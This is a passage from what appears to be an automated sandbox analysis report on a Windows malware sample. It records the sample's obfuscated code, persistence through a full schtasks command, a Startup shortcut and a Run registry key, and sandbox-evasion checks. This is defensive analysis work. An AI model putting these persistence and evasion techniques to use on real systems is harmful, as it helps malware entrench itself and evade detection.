'tE0AsQgAwdQqiO8BDrQr5ZcYkg9tfb3e0TR6YLjCXb5SiDthmhMzthas1DmOrEt2OYSMOZG9G4TzoAecECpP1', 'DPnUj4NQ5rq9dCZUOuoLGpKPuHkgCiI4kuqac2Ggd9ndTKmHSh2tznYgXYojkYyMjAmxwhoI7QSP3wNZRhVF0', 'p1XOSKQyP9RuZBRNZM1c800jcqppbOVM6Nxs4qMznZvowsLtVFFc8alOkYs1eVy4b7LBprYn6lIb8THZR4BGd'
                    Source: coding.3.dr, XRg5CXzghacu61mWJVTLzsueymr.cs | High entropy of concatenated method names: 'w1qPaUREO7T8hRMQz9GQxE25SXN', '_2iHgS5h0BqQUHK7TeTnxAOhnVgM', 'nfd6r5aBUpsy7CE8rO9VJhSYMre', 'OeZXC5mjse5URVGoXdFBLFGQ9fy', 'qVPyN3zZ2Fopgul5Iqx', 'PGah0mI29WHAiwuyJSF', 'jMaMzC3giKZVOXKQcg2', 'SX20c3RWuqbp5JbFd3i', 'yKOiYDyRU4P1NXn4R1H', 'Q6O7Um3JjDhLJWjFZkf'
                    Source: coding.3.dr, R2IfcvgzWekfqbuZeqPv4fujzXh.cs | High entropy of concatenated method names: 'GBUvwHj9hGdSdzf7eHgmiogVZiC', '_6lCL66hhXp3WGaGlAph3qC3UjvD', 'JmPzGWLVMSN6gbqZm5YCWCyMK2U', 'iEGrLLZwRN1c2ldpS01IjrAzd03', 'x0SK5wTlyL2wUlhFiIW7UcxXFpg', 'qRJdGH6fomWzdv4Z32TxPZYLul0', 'wkXGOCFqfXqw5npMP1P60RX0YT1', 'Lqg8Y6rFujCVFRB2iBAczp8YHpp', 'dNT12v4ke3EiYiRWnUDJrH1PALh', 'N03dsuRLQq27QaHq5wD1VjQZpyd'
                    Source: C:\Users\user\Desktop\24572628.exe | File created: C:\ProgramData\coding
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exe | File created: C:\Users\user\Desktop\24572628.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\24572628.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "C:\ProgramData\coding"
                    Source: C:\Users\user\Desktop\24572628.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coding.lnk
                    Source: C:\Users\user\Desktop\24572628.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run coding

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exe Process information set: NOOPENFILEERRORBOX (23 identical entries collapsed)
                    Source: C:\Users\user\Desktop\24572628.exe Process information set: NOOPENFILEERRORBOX (56 identical entries collapsed)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (163 identical entries collapsed)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\coding - Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\OpenWith.exe - Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: global traffic - HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
                    Source: C:\Users\user\Desktop\24572628.exe - WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: 24572628.exe, 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: SBIEDLL.DLL
                    Source: YPzNsfg4nR.exe, 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, 24572628.exe, 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, coding.3.dr, 24572628.exe.0.dr - Binary or memory string:
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exe - Memory allocated: 20868E00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exe - Memory allocated: 2086A700000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\24572628.exe - Memory allocated: A80000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\24572628.exe - Memory allocated: 1A5E0000 memory reserve | memory write watch
                    Source: C:\ProgramData\coding - Memory allocated: 670000 memory reserve | memory write watch
                    Source: C:\ProgramData\coding - Memory allocated: 1A430000 memory reserve | memory write watch
                    Source: C:\ProgramData\coding - Memory allocated: 12B0000 memory reserve | memory write watch
                    Source: C:\ProgramData\coding - Memory allocated: 1AD50000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exe - Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\24572628.exe - Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                    Source: C:\ProgramData\coding - Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\24572628.exe - Window / User API: threadDelayed 9337
